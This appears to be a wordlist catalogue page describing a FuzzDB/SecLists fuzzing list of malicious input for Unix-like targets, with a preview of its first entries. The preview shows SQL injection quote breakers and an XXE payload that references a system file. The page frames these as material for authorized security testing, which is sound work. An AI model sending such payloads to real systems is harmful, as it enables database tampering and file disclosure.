Skip to content
Fuzzing13 KB

Unix Attack Fuzz Strings (FuzzDB)

Wide sample of malicious input for Unix-like targets mixing SQLi quote breakers, format strings, XXE and command-injection vectors from FuzzDB.

View source
Size
13 KB
Category
Fuzzing
Source
danielmiessler/SecLists
License
MIT
Recommended tools
wfuzzffufburp

Preview

First 15 entries. Download or copy the full list (13 KB) using the buttons above.

>head unix-attacks-fuzzdb-seclists.txt13 KB
# a wide sample of malicious input for unix-like targets
!
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
!@#0%^#0##018387@#0^^**(()
"
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 --
" or 1=1 or ""="
" or 1=1--
"' or 1 --'"
") or ("a"="a
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"

Wide sample of malicious input for Unix-like targets mixing SQLi quote breakers, format strings, XXE and command-injection vectors from FuzzDB.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 13 KB and pairs well with tools such as wfuzz, ffuf, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from danielmiessler/SecLists and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.